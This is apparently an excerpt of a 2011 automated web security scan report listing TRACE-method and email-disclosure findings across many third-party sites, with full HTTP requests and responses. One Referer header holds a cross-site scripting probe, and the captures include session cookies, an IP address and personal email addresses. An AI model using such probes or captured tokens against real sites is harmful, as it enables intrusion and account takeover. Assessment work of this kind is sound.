Severity:	Information
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: forums.vostu.com
Cookie: c062b457335d2fec

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:13:52 GMT
Server: Apache/2.2.14 (Unix) mod_fcgid/2.3.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: forums.vostu.com
Cookie: c062b457335d2fec; Az_sessionhash=f2fc3b7ee681a301a4d1c803b2ed4a15; Az_lastactivity=0; Az_languageid=2; Az_userstyleid=8; Az_lastvisit=1311275630; __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmc=321
...[SNIP]...

21.4. http://mm.chitika.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mm.chitika.net
Path:	/

Request

TRACE / HTTP/1.0
Host: mm.chitika.net
Cookie: 6bca5a4e00e054d4

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: mm.chitika.net
Cookie: 6bca5a4e00e054d4

21.5. http://pixel.everesttech.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 10bbca8c54ee99c8

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:51 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 10bbca8c54ee99c8; everest_g_v2=g_surferid~er9OKHxYa3AAAMko; everest_session_v2=EsNOKHzlCnwAAAt2
Connection: Keep-Alive
X-EF-Forwarded-For: 173.193.214.243

21.6. http://pixel1350.everesttech.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel1350.everesttech.net
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel1350.everesttech.net
Cookie: f55f7f371423e0e2

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:02 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel1350.everesttech.net
Cookie: f55f7f371423e0e2; everest_session_v2=er9OKHxYa3AAAMko; everest_g_v2=g_surferid~er9OKHxYa3AAAMko
Connection: Keep-Alive
X-EF-Forwarded-For: 173.193.214.243

21.7. http://puma.vizu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: puma.vizu.com
Cookie: 55a8befdd43f241f

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:47 GMT
Server: PWS/1.7.3.3
X-Px: nc iad-agg-n29 ( origin>CONN)
Content-Length: 344
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: origin.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n29.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 173.193.214.243, 66.114.52.39
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://puma.vizu.com/
Cookie: 55a8befdd43f241f
Connection: keep-alive

21.8. http://web2.checkm8.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/

Request

TRACE / HTTP/1.0
Host: web2.checkm8.com
Cookie: 5c570c86720eeda0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: web2.checkm8.com
Cookie: 5c570c86720eeda0; cm8dccp=1311365646

22. Email addresses disclosed previous next
There are 67 instances of this issue:

http://ads1.msn.com/library/dap.js
http://betaworks.com/
http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js
http://clients.mobilecause.com/lists/1227/subscriptions/web.js
https://code.google.com/p/domsnitch/downloads/detail
http://code.msdn.microsoft.com/
http://consultants-locator.apple.com/javascript/yui/accordionview.js
http://consultants.apple.com/jquery.innerfade.js
http://corp.klout.com/blog/
http://corp.klout.com/blog/wp-content/themes/klout/blog.css
http://corp.klout.com/press
http://corp.klout.com/privacy
http://forums.vostu.com/
http://frid.ge/scripts/fridge-combined.1311259715.js
http://i1.asp.net/umbraco-script/msc_all.js
http://i1.code.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js
http://i1.codeplex.com/scripts/v17950/i7/ScriptLoader.ashx
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js
http://i2.msdn.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js
http://i2.msdn.microsoft.com/Platform/Controls/Omniture/resources/MSDN/omni_rsid_msdn-bn20110713.js
http://i2.silverlight.net/scripts/omniture.js
http://images.apple.com/global/scripts/lib/event_mixins.js
http://images.apple.com/global/scripts/lib/scriptaculous.js
http://js.wlxrs.com/~Live.SiteContent.ID/~16.1.11/~/~/~/~/js/Main_WLStrings_JS1033.js
http://keepitfresh.frid.ge/
http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/357c/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js
http://mediacdn.disqus.com/1311185431/build/system/disqus.js
http://mediacdn.disqus.com/1311376479/build/system/disqus.js
https://onlinebanking.capitalone.com/CapitalOne/Enrollment.aspx
http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110719191037.js
http://sj.wsj.net/djscript/require/j_global_slim/version/20110721222540.js
http://storeimages.apple.com/1867/store.apple.com/rs/js/store/release/apple.js
http://widgets.twimg.com/j/2/widget.js
http://www.articleonepartners.com/sidebar-modules/get_blog_json.php
http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
http://www.capitalone.com/contactus/index.php
http://www.capitalone.com/css/footer.css
http://www.capitalone.com/css/framework/base.css
http://www.capitalone.com/css/framework/grid.css
http://www.capitalone.com/css/framework/print.css
http://www.capitalone.com/css/header.css
http://www.capitalone.com/css/page-nav-heading.css
http://www.capitalone.com/scripts/https-common/jquery/tooltip/bgiframe.js
https://www.capitalone.com/css/footer.css
https://www.capitalone.com/css/framework/base.css
https://www.capitalone.com/css/framework/grid.css
https://www.capitalone.com/css/framework/print.css
https://www.capitalone.com/css/header.css
https://www.capitalone.com/css/page-nav-heading.css
https://www.capitalone.com/css/page-type/homepage.css
http://www.google.com/search
https://www.google.com/accounts/ServiceLogin
http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx
http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
http://www.lifescript.com/js/jquery.innerfade.js
http://www.observer.com/
http://www.paloaltonetworks.com/js/plugins/jquery.colorbox.js
http://www.scmagazineus.com/
http://www.silverpop.com/Scripts/new-banners.js
http://www.silverpop.com/preferences_sf/preferences_sf.js.php
http://www.treehugger.com/h-code.js
http://www.treehugger.com/scripts/colorbox/jquery.colorbox.js
http://www.vostu.com/en/
http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/
http://www.vostu.com/en/news/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

22.1. http://ads1.msn.com/library/dap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/library/dap.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dap.js HTTP/1.1
Host: ads1.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; CULTURE=EN-US; MSNRPSShare=1; MUID=1FDD375D440B439987A467BECD35D2C6

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:45:13 GMT
Expires: Sat, 23 Jul 2011 17:38:25 GMT
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13811

var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

22.2. http://betaworks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://betaworks.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@betaworks.com

Request

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 16:23:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6834
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Betaworks</title>
<meta h
...[SNIP]...
<a href="mailto:info@betaworks.com">info@betaworks.com</a>
...[SNIP]...

22.3. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.msdn.com
Path:	/utility/js/omni_rsid_msdn_current.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /utility/js/omni_rsid_msdn_current.js HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/msdnmagazine/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 17:39:25 GMT
Accept-Ranges: bytes
ETag: "e0fe96f94c42cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 23 Jul 2011 02:08:24 GMT
Content-Length: 73913

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol
// for blogs this should be either
// omniGuidPath : "://blogs.msdn.com/anal
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

22.4. http://clients.mobilecause.com/lists/1227/subscriptions/web.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clients.mobilecause.com
Path:	/lists/1227/subscriptions/web.js

Issue detail

The following email address was disclosed in the response:

haineault@gmail.com

Request

Response

22.5. https://code.google.com/p/domsnitch/downloads/detail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://code.google.com
Path:	/p/domsnitch/downloads/detail

Issue detail

The following email address was disclosed in the response:

r...@r-n-d.org

Request

Response

22.6. http://code.msdn.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/

Issue detail

The following email address was disclosed in the response:

Mscsgfeeback@microsoft.com

Request

Response

22.7. http://consultants-locator.apple.com/javascript/yui/accordionview.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/accordionview.js

Issue detail

The following email address was disclosed in the response:

marco@i-marco.nl

Request

GET /javascript/yui/accordionview.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:15 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 36905
Connection: close
Content-Type: text/html;charset=UTF-8

(function() {

/**
*
* By Marco van Hylckama Vlieg (marco@i-marco.nl)
*
* THIS IS A WORK IN PROGRESS
*
* Many, many thanks go out to Daniel Satyam Barreiro!
* Please read his article about YUI widget development
* http://yuiblog.com/blog/2
...[SNIP]...

22.8. http://consultants.apple.com/jquery.innerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://consultants.apple.com
Path:	/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /jquery.innerfade.js HTTP/1.1
Host: consultants.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:39:55 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8k DAV/2 PHP/5.3.0 mod_fastcgi/2.4.2
Last-Modified: Sat, 27 Mar 2010 16:31:18 GMT
ETag: "2247ab-13be-482cacf31e180"
Accept-Ranges: bytes
Content-Length: 5054
Cache-Control: max-age=60
Expires: Thu, 21 Jul 2011 20:40:55 GMT
MS-Author-Via: DAV
Content-Type: application/javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

22.9. http://corp.klout.com/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/blog/

Issue detail

The following email address was disclosed in the response:

megan@klout.com

Request

Response

22.10. http://corp.klout.com/blog/wp-content/themes/klout/blog.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/blog/wp-content/themes/klout/blog.css

Issue detail

The following email address was disclosed in the response:

iam@gregario.us

Request

GET /blog/wp-content/themes/klout/blog.css HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
Referer: http://corp.klout.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.2.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home; WRUID=0; _chartbeat2=t4l7yjjkeowrdz3v

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:52:38 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Fri, 17 Jun 2011 22:08:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2028
Content-Type: text/css

/*
Theme Name: Klout
Theme URI: http://klout.com/
Description: The default Klout Theme</a>.
Version: 1.0
Author: Gregarious Narain
Author URI: http://iam@gregario.us/
Tags: klout, influence

   Klout v1.0
   http://binarybonsai.com/kubrick/

   This theme was designed and built by Gregarious Narain,
   whose blog you will find at http://iam@gregario.us/

   The CSS, XHTML and design is released under GPL:
   http://www.opensource.org/licenses/gpl-license.php

*/

h1 a { color: #605459; }

a {
   color: #1FB2B0;
}
.billboard {
   padding: 20px 25px;
}
.profi
...[SNIP]...

22.11. http://corp.klout.com/press previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/press

Issue detail

The following email address was disclosed in the response:

press@klout.com

Request

Response

22.12. http://corp.klout.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/privacy

Issue detail

The following email address was disclosed in the response:

privacy@klout.com

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:13 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 14695
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Klout Privacy Po
...[SNIP]...
<a href="mailto:privacy@klout.com">privacy@klout.com</a>
...[SNIP]...
<a href="mailto:privacy@klout.com">privacy@klout.com</a>
...[SNIP]...

22.13. http://forums.vostu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@vostu.com

Request

Response

22.14. http://frid.ge/scripts/fridge-combined.1311259715.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://frid.ge
Path:	/scripts/fridge-combined.1311259715.js

Issue detail

The following email addresses were disclosed in the response:

admin@emposha.com
jb@eaio.com

Request

GET /scripts/fridge-combined.1311259715.js HTTP/1.1
Host: frid.ge
Proxy-Connection: keep-alive
Referer: http://frid.ge/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _fsc=2rk7v0mb4bj21uv0a4e096o6r4

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: application/x-javascript
Date: Fri, 22 Jul 2011 20:58:10 GMT
Expires: Sun, 21 Aug 2011 20:58:10 GMT
Last-Modified: Thu, 21 Jul 2011 14:49:26 GMT
Server: nginx/0.7.65
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 420328

/* jquery.tools.1.2.5.js */
(function(){function f(a,b){if(b)for(var c in b)if(b.hasOwnProperty(c))a[c]=b[c];return a}function l(a,b){var c=[];for(var d in a)if(a.hasOwnProperty(d))c[d]=b(a[d]);return
...[SNIP]...
<admin@emposha.com>
...[SNIP]...
<mailto:jb@eaio.com>
...[SNIP]...

22.15. http://i1.asp.net/umbraco-script/msc_all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i1.asp.net
Path:	/umbraco-script/msc_all.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /umbraco-script/msc_all.js?cdn_id=2011-07-12-003 HTTP/1.1
Host: i1.asp.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.asp.net/ajax

Response

HTTP/1.1 200 OK
Pragma: public
Content-Type: application/x-javascript
Last-Modified: Fri, 01 Oct 2010 04:10:36 GMT
Accept-Ranges: bytes
ETag: "cf64ae991e61cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 38384
Cache-Control: public, max-age=45605574
Expires: Tue, 01 Jan 2013 00:59:35 GMT
Date: Sat, 23 Jul 2011 04:46:41 GMT
Connection: close

jQuery.fn.captcha=function(expiryUrl){var strFunc='$("'+this.selector+"\").attr('value', key);";$.get(expiryUrl,new Function("key",strFunc));};jQuery.fn.clientPaging=function(settings){var options=$.e
...[SNIP]...
'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b
...[SNIP]...

22.16. http://i1.code.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i1.code.msdn.s-msft.com
Path:	/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js?cver=0001 HTTP/1.1
Host: i1.code.msdn.s-msft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://code.msdn.microsoft.com/

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 19:39:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
Server: GALS01
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69304
Cache-Control: public, max-age=15449361
Date: Sat, 23 Jul 2011 04:46:53 GMT
Connection: close

var _om_gbls={omniGuidPath:"",version:"1107",tmp:"",s_account:"",market:"",app:"",center:"",library:"",subdom:"",catpath:"",site:"",wtspparam:"",host:"",path:"",href:"",extraRsids:"",extraRsidsArr:"",
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

22.17. http://i1.codeplex.com/scripts/v17950/i7/ScriptLoader.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i1.codeplex.com
Path:	/scripts/v17950/i7/ScriptLoader.ashx

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /scripts/v17950/i7/ScriptLoader.ashx HTTP/1.1
Host: i1.codeplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rawr.codeplex.com/
Cookie: ASP.NET_SessionId=1rkf4qe1hdczdv3okbmzafvt

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 584952
Cache-Control: public, max-age=29593936
Expires: Fri, 29 Jun 2012 17:19:10 GMT
Date: Sat, 23 Jul 2011 04:46:54 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2010, The Dojo Foundation
* Released under
...[SNIP]...
